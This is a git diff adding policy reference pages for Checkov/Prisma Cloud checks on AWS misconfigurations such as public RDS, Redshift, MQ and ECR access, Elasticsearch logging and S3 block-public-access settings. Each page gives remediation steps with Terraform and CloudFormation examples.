+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py[CKV_AWS_84]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Amazon Elasticsearch Service (Amazon ES) exposes logs through CloudWatch.
+ES logs help you troubleshoot performance and stability issues, while audit logs track user activity for compliance purposes.
+Supported ES logs include error logs, search slow logs, index slow logs, and audit logs.
+All logs are disabled by default.
+
+We recommend you enable Elasticsearch domain logging.
+
+NOTE: If enabled, standard CloudWatch pricing applies.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/es/home[Amazon Elasticsearch console].
+
+. In the navigation pane, under *My domains*, select the domain that you want to update.
+
+. Navigate to the *Logs* tab.
++
+For the log that you are working with, select *Enable*.
+
+. Create a *CloudWatch log group*, or select an existing one.
+
+. Select an access policy that contains the appropriate permissions, or create a new policy.
++
+Select *Enable*.
+
+. The *status* of your domain changes from *Active* to *Processing*.
++
+The status of your domain must return to *Active* before log publishing is enabled.
+
+
+*CLI Command*
+
+
+Before you can enable log publishing, you need a CloudWatch log group.
+If you don't already have one, you will need to create one.
+You must also grant Amazon ES permission to write to the log group with a resource policy:
+
+
+[source,shell]
+----
+aws logs put-resource-policy --policy-name my-policy --policy-document <policy_doc_json>
+----
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_elasticsearch_domain
+* *Arguments:* log_publishing_options - (Optional) Options for publishing slow and application logs to CloudWatch Logs.
+This block can be declared multiple times, for each log_type, within the same resource.
+
+
+[source,go]
+----
+resource "aws_elasticsearch_domain" "example" {
+  ...
+  domain_name = "example"
+
+  log_publishing_options {
+    cloudwatch_log_group_arn = aws_cloudwatch_log_group.example.arn
+    log_type                 = "INDEX_SLOW_LOGS"
+  }
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Elasticsearch::Domain
+* *Arguments:* Properties.LogPublishingOptions.AUDIT_LOGS.Enabled
+
+
+[source,yaml]
+----
+Resources:
+  Resource0:
+    Type: 'AWS::Elasticsearch::Domain'
+    Properties:
+      ...
+      LogPublishingOptions:
+        AUDIT_LOGS:
++          Enabled: True
+      ...
+----
diff --git a/code-security/policy-reference/aws-policies/elastisearch-policies/elastisearch-policies.adoc b/code-security/policy-reference/aws-policies/elastisearch-policies/elastisearch-policies.adoc
new file mode 100644
index 000000000..59f2027f7
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/elastisearch-policies/elastisearch-policies.adoc
@@ -0,0 +1,29 @@
+== Elasticsearch Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:elasticsearch-3-enable-encryptionatrest.adoc[AWS Elasticsearch domain Encryption for data at rest is disabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryption.py[CKV_AWS_5]
+|LOW
+
+
+|xref:elasticsearch-5.adoc[AWS Elasticsearch does not have node-to-node encryption enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchNodeToNodeEncryption.py[CKV_AWS_6]
+|MEDIUM
+
+
+|xref:elasticsearch-6.adoc[AWS Elasticsearch domain is not configured with HTTPS]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainEnforceHTTPS.py[CKV_AWS_83]
+|MEDIUM
+
+
+|xref:elasticsearch-7.adoc[AWS Elasticsearch domain logging is not enabled]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ElasticsearchDomainLogging.py[CKV_AWS_84]
+|MEDIUM
+
+
+|===
+
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public.adoc b/code-security/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public.adoc
new file mode 100644
index 000000000..57f6ae566
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-1-ecr-repositories-not-public.adoc
@@ -0,0 +1,86 @@
+== AWS Private ECR repository policy is overly permissive
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 9f40d30b-97fd-4ec5-827b-f74b50a312b9
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRPolicy.py[CKV_AWS_32]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+AWS ECR is a managed Docker registry service that simplifies Docker container image management.
+An ECR repository is a collection of Docker images available on AWS.
+Access control to ECR repositories is governed using resource-based policies.
+A public ECR repository can expose internal Docker images that contain confidential business logic.
+We recommend you do not allow unrestricted public access to ECR repositories to help avoid data leakage.
+
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/ecs/[Amazon ECS console].
+
+. Select *Amazon ECR*, then select *Repositories*.
+
+. Click the image repository that you want to configure.
++
+To modify the permission policy, select *Permissions*.
+
+. In the *Permission statements*, select the _policy statement_ that has *Effect* set to *Allow* and *Principal* set to `*`.
+
+. To select a restricted access policy, click *Edit* and make changes.
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::ECR::Repository
+* *Argument:* Properties.RepositoryPolicyText.Statement.Principal
+
+
+[source,yaml]
+----
+Resources:
+  MyRepository:
+    Type: AWS::ECR::Repository
+    Properties:
+      ...
+      RepositoryPolicyText:
+        ...
+        Statement:
+          - ...
+-           Principal: "*"
++           Principal:
++             AWS:
++               - "arn:aws:iam::123456789012:user/Bob"
++               - ...
+----
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-11.adoc b/code-security/policy-reference/aws-policies/public-policies/public-11.adoc
new file mode 100644
index 000000000..d7c71a9d9
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-11.adoc
@@ -0,0 +1,92 @@
+== AWS MQ is publicly accessible
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| be6e507b-b1e5-4043-a8d7-94df078f81e6
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py[CKV_AWS_69]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Brokers created without public accessibility cannot be accessed from outside of your VPC.
+This greatly reduces your broker's susceptibility to DDoS attacks from the internet.
+Public Amazon MQ brokers can be accessed directly, outside of a VPC, allowing any host on the Internet to reach your brokers through their public endpoints.
+This can increase the opportunity for malicious activity such as cross-site scripting and clickjacking attacks.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/amazon-mq/[Amazon MQ console].
+
+. In the *Select deployment and storage* page, in the *Deployment mode and storage type* section, configure your MQ based on your specs.
+
+. In the *Network and security* section, configure your broker's connectivity and select the *Public accessibility* of your broker.
++
+Disabling public accessibility makes the broker accessible only within your VPC.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_mq_broker
+* *Arguments:* publicly_accessible - (Optional) Whether to enable connections from applications outside of the VPC that hosts the broker's subnets.
+
+
+[source,go]
+----
+resource "aws_mq_broker" "example" {
+  broker_name = "example"
++ publicly_accessible = false
+
+  configuration {
+    id       = aws_mq_configuration.test.id
+    revision = aws_mq_configuration.test.latest_revision
+  }
+
+  engine_type        = "ActiveMQ"
+  engine_version     = "5.15.0"
+  host_instance_type = "mq.t2.micro"
+  security_groups    = [aws_security_group.test.id]
+
+  user {
+    username = "ExampleUser"
+    password = "MindTheGap"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-12.adoc b/code-security/policy-reference/aws-policies/public-policies/public-12.adoc
new file mode 100644
index 000000000..2f91290a5
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-12.adoc
@@ -0,0 +1,110 @@
+== AWS EC2 instances with public IP and associated with security groups have Internet access
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 2c2fb17b-b4bf-4fdd-bada-e7c510e2649e
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2PublicIP.py[CKV_AWS_88]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+A public IP address is an IPv4 address that is reachable from the Internet.
+You can use public addresses for communication between your instances and the Internet.
+Each instance that receives a public IP address is also given an external DNS hostname.
+We recommend you control whether your instance receives a public IP address as required.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/vpc[Amazon VPC console].
+
+. In the navigation pane, select *Subnets*.
+
+. Select a *subnet*, then select *Subnet Actions* > *Modify auto-assign IP settings*.
+
+. Select *auto-assign public IPv4 address*.
++
+When selected, this requests a public IPv4 address for all instances launched into the selected subnet.
++
+Select or clear the setting as required.
+
+. Click *Save*.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_instance
+* *Arguments:* associate_public_ip_address - (Optional) Associate a public ip address with an instance in a VPC.
+Boolean value.
+
+
+[source,go]
+----
+resource "aws_instance" "bar" {
+  ...
+- associate_public_ip_address = true
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::EC2::Instance / AWS::EC2::LaunchTemplate
+* *Arguments:* NetworkInterfaces.AssociatePublicIpAddress - (Optional) Associate a public ip address with an instance in a VPC.
+Boolean value.
+
+
+[source,yaml]
+----
+Resources:
+  EC2Instance:
+    Type: AWS::EC2::Instance
+    Properties:
+      ...
+      NetworkInterfaces:
+        - ...
+-         AssociatePublicIpAddress: true
+
+  EC2LaunchTemplate:
+    Type: AWS::EC2::LaunchTemplate
+    Properties:
+      LaunchTemplateData:
+        ...
+        NetworkInterfaces:
+          - ...
+-           AssociatePublicIpAddress: true
+----
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-13.adoc b/code-security/policy-reference/aws-policies/public-policies/public-13.adoc
new file mode 100644
index 000000000..0f4124372
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-13.adoc
@@ -0,0 +1,77 @@
+== DMS replication instance should not be publicly accessible
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| a1497898-ea75-4d3b-b806-b9cae5442771
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py[CKV_AWS_89]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+AWS Database Migration Service (AWS DMS) is a service for migrating relational databases, data warehouses, NoSQL databases and other data stores.
+DMS can be used to migrate data into the AWS Cloud, between on-premises instances, or between combinations of cloud and on-premises environments.
+An AWS DMS replication instance can have one public IP address and one private IP address, just like an Amazon Elastic Compute Cloud (Amazon EC2) instance that has a public IP address.
+If you clear (disable) the *Publicly accessible* option, the replication instance has only a private IP address.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_dms_replication_instance
+* *Arguments:* publicly_accessible - (Optional, Default: false) Specifies the accessibility options for the replication instance.
+
+A value of true represents an instance with a public IP address.
+A value of false represents an instance with a private IP address.
+
+
+[source,go]
+----
+resource "aws_dms_replication_instance" "test" {
+  ...
+  allocated_storage = 20
++ publicly_accessible = false
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::DMS::ReplicationInstance
+* *Arguments:* Properties.PubliclyAccessible - (Optional, Default: false) Specifies the accessibility options for the replication instance.
+
+A value of true represents an instance with a public IP address.
+A value of false represents an instance with a private IP address.
+
+
+[source,yaml]
+----
+Resources:
+  ReplicationInstance:
+    Type: AWS::DMS::ReplicationInstance
+    Properties:
+      ...
++     PubliclyAccessible: False
+----
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-2.adoc b/code-security/policy-reference/aws-policies/public-policies/public-2.adoc
new file mode 100644
index 000000000..a083951ce
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-2.adoc
@@ -0,0 +1,101 @@
+== AWS RDS database instance is publicly accessible
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 1bb6005a-dca6-40e2-b0a6-24da968c0808
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py[CKV_AWS_17]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+When an RDS database instance is created with the *Publicly Accessible* option enabled, it receives a public endpoint that can be resolved and reached from the Internet.
+Publicly accessible database instances increase the attack surface and the risk of unauthorized access, brute-force attempts, and data exfiltration.
+We recommend you keep RDS database instances private and allow connections only from within your VPC.
+
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the setting using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Open the https://console.aws.amazon.com/rds[Amazon RDS console].
+
+. On the navigation pane, click *Databases*.
+
+. Select the _database instance_ to update, then click *Modify*.
+
+. Under *Connectivity*, expand *Additional configuration* and select *Not publicly accessible*.
+
+. Click *Continue*, then apply the modification.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_db_instance
+* *Arguments:* publicly_accessible
+
+
+[source,go]
+----
+resource "aws_db_instance" "default" {
+  ...
++ publicly_accessible = false
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::RDS::DBInstance
+* *Arguments:* Properties.PubliclyAccessible
+
+
+[source,yaml]
+----
+Type: 'AWS::RDS::DBInstance'
+Properties:
+  ...
++ PubliclyAccessible: false
+----
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-6-api-gateway-authorizer-set.adoc b/code-security/policy-reference/aws-policies/public-policies/public-6-api-gateway-authorizer-set.adoc
new file mode 100644
index 000000000..f8647d6c8
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-6-api-gateway-authorizer-set.adoc
@@ -0,0 +1,93 @@
+== AWS API gateway methods are publicly accessible
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 7cc87c0f-aeb7-4397-9ee7-c90eaf24e770
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py[CKV_AWS_59]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+AWS API gateway methods are by default publicly accessible.
+All of the methods configured as part of the API should be protected by an authorizer or an API key.
+Unprotected APIs can lead to data leaks and security breaches.
+We recommend you configure a custom authorizer or an API key for every method in the API Gateway.
+
+=== Fix - Buildtime
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::ApiGateway::Method
+* *Arguments:* Properties.HttpMethod / Properties.AuthorizationType / Properties.ApiKeyRequired
+
+
+[source,yaml]
+----
+Resources:
+  ProtectedExample1:
+    Type: 'AWS::ApiGateway::Method'
+    Properties:
+      ...
++     HttpMethod: OPTIONS
+      AuthorizationType: NONE
+      ...
+
+  ProtectedExample2:
+    Type: 'AWS::ApiGateway::Method'
+    Properties:
+      ...
+      HttpMethod: GET
+      AuthorizationType: NONE
++     ApiKeyRequired: true
+      ...
+
+  ProtectedExample3:
+    Type: 'AWS::ApiGateway::Method'
+    Properties:
+      ...
+      HttpMethod: GET
++     AuthorizationType: AWS_IAM # or other valid authorization types
+      ...
+----
+
+
+*Terraform*
+
+
+* *Resource:* aws_api_gateway_method
+* *Arguments:* http_method, authorization, api_key_required
+
+
+[source,go]
+----
+resource "aws_api_gateway_method" "pass" {
+  rest_api_id = aws_api_gateway_rest_api.MyDemoAPI.id
+  resource_id = aws_api_gateway_resource.MyDemoResource.id
+
+  http_method = "OPTIONS"
+
+  authorization = "NONE"
+
+  api_key_required = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-9.adoc b/code-security/policy-reference/aws-policies/public-policies/public-9.adoc
new file mode 100644
index 000000000..3f0acae4c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-9.adoc
@@ -0,0 +1,92 @@
+== AWS Redshift clusters should not be publicly accessible
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| f7e5da40-e30e-43d2-81d3-a5f59aa38b21
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py[CKV_AWS_87]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Redshift clusters deployed within a VPC can be accessed from the Internet, from EC2 instances outside the VPC via VPN, from bastion hosts launched in a public subnet, or through Amazon Redshift's *Publicly Accessible* option.
+If you create your Redshift clusters with the *Publicly Accessible* option set to *Yes*, they are fully accessible outside your VPC.
+If you do not want your Redshift clusters accessible from the Internet or outside your VPC, disable the Redshift *Publicly Accessible* option.
+If your AWS account allows you to create EC2-Classic clusters, the default option for *Publicly Accessible* is *No*.
+Public access to a Redshift cluster can increase the opportunity for malicious activity such as SQL injection or Distributed Denial of Service (DDoS) attacks.
+
+////
+=== Fix - Runtime
+
+
+*AWS Console*
+
+
+To change the policy using the AWS Console, follow these steps:
+
+. Log in to the AWS Management Console at https://console.aws.amazon.com/.
+
+. Navigate to the *Redshift* service.
+
+. Click on the identified Redshift cluster name.
+
+. In the menu options, click *Cluster*, then select *Modify*.
+
+. Ensure the value for *Publicly Accessible* is set to *No*.
+////
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_redshift_cluster
+* *Arguments:* publicly_accessible
+
+
+[source,go]
+----
+resource "aws_redshift_cluster" "default" {
+  cluster_identifier = "tf-redshift-cluster"
+  ...
+- publicly_accessible = "true"
++ publicly_accessible = "false"
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Redshift::Cluster
+* *Arguments:* Properties.PubliclyAccessible
+
+
+[source,yaml]
+----
+Type: "AWS::Redshift::Cluster"
+Properties:
+  ...
+- PubliclyAccessible: true
++ PubliclyAccessible: false
+----
diff --git a/code-security/policy-reference/aws-policies/public-policies/public-policies.adoc b/code-security/policy-reference/aws-policies/public-policies/public-policies.adoc
new file mode 100644
index 000000000..bdc5de89d
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/public-policies/public-policies.adoc
@@ -0,0 +1,44 @@
+== Public Policies
+
+[width=85%]
+[cols="1,1,1"]
+|===
+|Policy|Checkov Check ID| Severity
+
+|xref:public-1-ecr-repositories-not-public.adoc[AWS Private ECR repository policy is overly permissive]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRPolicy.py[CKV_AWS_32]
+|HIGH
+
+
+|xref:public-11.adoc[AWS MQ is publicly accessible]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/AmazonMQBrokerPublicAccess.py[CKV_AWS_69]
+|MEDIUM
+
+
+|xref:public-12.adoc[AWS EC2 instances with public IP and associated with security groups have Internet access]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EC2PublicIP.py[CKV_AWS_88]
+|HIGH
+
+
+|xref:public-13.adoc[DMS replication instance should not be publicly accessible]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DMSReplicationInstancePubliclyAccessible.py[CKV_AWS_89]
+|HIGH
+
+
+|xref:public-2.adoc[AWS RDS database instance is publicly accessible]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RDSPubliclyAccessible.py[CKV_AWS_17]
+|MEDIUM
+
+
+|xref:public-6-api-gateway-authorizer-set.adoc[AWS API gateway methods are publicly accessible]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py[CKV_AWS_59]
+|LOW
+
+
+|xref:public-9.adoc[AWS Redshift clusters should not be publicly accessible]
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/RedshitClusterPubliclyAvailable.py[CKV_AWS_87]
+|HIGH
+
+
+|===
+
diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-19.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-19.adoc
new file mode 100644
index 000000000..3290c9220
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-19.adoc
@@ -0,0 +1,58 @@
+== AWS S3 Buckets has block public access setting disabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 39bced69-0875-4e10-a8e6-bffb1c5b3319
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py[CKV_AWS_53]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Amazon S3 buckets and objects are configured to be private.
+They are protected by default, with the option to use Access Control Lists (ACLs) and bucket policies to grant access to other AWS accounts and to anonymous public requests.
+The *Block public access to buckets and objects granted through new access control lists (ACLs)* option does not allow the use of new public bucket or object ACLs, ensuring future PUT requests that include them will fail.
+This setting helps protect against future attempts to use ACLs to make buckets or objects public.
+When an application tries to upload an object with a public ACL, this setting blocks the request.
+We recommend you set S3 Bucket BlockPublicAcls to *True*.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_s3_bucket_public_access_block
+* *Argument:* block_public_acls
+
+
+[source,go]
+----
+resource "aws_s3_bucket_public_access_block" "artifacts" {
+  count  = var.bucketname == "" ? 1 : 0
+  bucket = aws_s3_bucket.artifacts[0].id
+
++ block_public_acls       = true
+  block_public_policy     = true
+  restrict_public_buckets = true
+  ignore_public_acls      = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-20.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-20.adoc
new file mode 100644
index 000000000..37e984166
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-20.adoc
@@ -0,0 +1,58 @@
+== AWS S3 Bucket BlockPublicPolicy is not set to True
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 93d2336f-0c9c-448e-b18e-bc7122cbf8a0
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py[CKV_AWS_54]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Amazon S3 Block Public Access policy works at the account level and on individual buckets, including those created in the future.
+It provides the ability to block existing public access, whether specified by an ACL or a policy, and ensures public access is not granted to newly created items.
+If an AWS account is used to host a data lake or another business application, blocking public access will serve as an account-level guard against accidental public exposure.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_s3_bucket_public_access_block
+* *Argument:* block_public_policy
+
+
+[source,go]
+----
+resource "aws_s3_bucket_public_access_block" "artifacts" {
+  count  = var.bucketname == "" ? 1 : 0
+  bucket = aws_s3_bucket.artifacts[0].id
+
+  block_public_acls       = true
++ block_public_policy     = true
+  restrict_public_buckets = true
+  ignore_public_acls      = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-21.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-21.adoc
new file mode 100644
index 000000000..e0f583693
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-21.adoc
@@ -0,0 +1,71 @@
+== AWS S3 bucket IgnorePublicAcls is not set to True
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 28a820e2-f227-45aa-a80c-1873efb2d0b1
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py[CKV_AWS_55]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+The IgnorePublicAcls setting causes S3 to ignore all public ACLs on a bucket and any objects that it contains.
+Enabling this setting does not affect the persistence of any existing ACLs and does not prevent new public ACLs from being set.
+This setting will block public access granted by ACLs while still allowing PUT Object calls that include a public ACL.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_s3_bucket_public_access_block
+* *Arguments:* ignore_public_acls
+
+
+[source,go]
+----
+resource "aws_s3_bucket_public_access_block" "artifacts" {
+  ...
+  restrict_public_buckets = true
++ ignore_public_acls      = true
+}
+----
+
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::S3::Bucket
+* *Arguments:* Properties.PublicAccessBlockConfiguration.IgnorePublicAcls
+
+
+[source,yaml]
+----
+Type: 'AWS::S3::Bucket'
+Properties:
+  ...
+  PublicAccessBlockConfiguration:
+    ...
++ IgnorePublicAcls: true +---- diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-22.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-22.adoc new file mode 100644 index 000000000..e4bca6afb --- /dev/null +++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-22.adoc @@ -0,0 +1,77 @@ +== AWS S3 bucket RestrictPublicBucket is not set to True + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ed4af42c-c3fc-4857-aca8-3b254a141465 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py[CKV_AWS_56] + +|Severity +|MEDIUM + +|Subtype +|Build + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +The S3 Block Public Access configuration enables specifying whether S3 should restrict public bucket policies for buckets in this account. +Setting RestrictPublicBucket to TRUE restricts access to buckets with public policies to only AWS services and authorized users within this account. +Enabling this setting does not affect previously stored bucket policies. +Public and cross-account access within any public bucket policy, including non-public delegation to specific accounts, is blocked. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_s3_bucket_public_access_block +* *Arguments:* restrict_public_buckets + + +[source,go] +---- +resource "aws_s3_bucket_public_access_block" "artifacts" { + ... ++ restrict_public_buckets = true +} +---- + + +*CloudFormation* + + +* *Resource:* AWS::S3::Bucket +* *Arguments:* Properties.PublicAccessBlockConfiguration.RestrictPublicBuckets + + +[source,yaml] +---- +Type: 'AWS::S3::Bucket' + Properties: + ... + PublicAccessBlockConfiguration: + ...
++ RestrictPublicBuckets: true +---- diff --git a/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-23.adoc b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-23.adoc new file mode 100644 index 000000000..0e1a8352c --- /dev/null +++ b/code-security/policy-reference/aws-policies/s3-policies/bc-aws-s3-23.adoc @@ -0,0 +1,131 @@ +== AWS S3 bucket policy overly permissive to any principal + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8827bbb9-bf4b-4d39-a21d-dcf62037244d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py[CKV_AWS_70] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +*AWS S3 bucket policy overly permissive to any principal* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8827bbb9-bf4b-4d39-a21d-dcf62037244d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3AllowsAnyPrincipal.py[CKV_AWS_70] + +|Severity 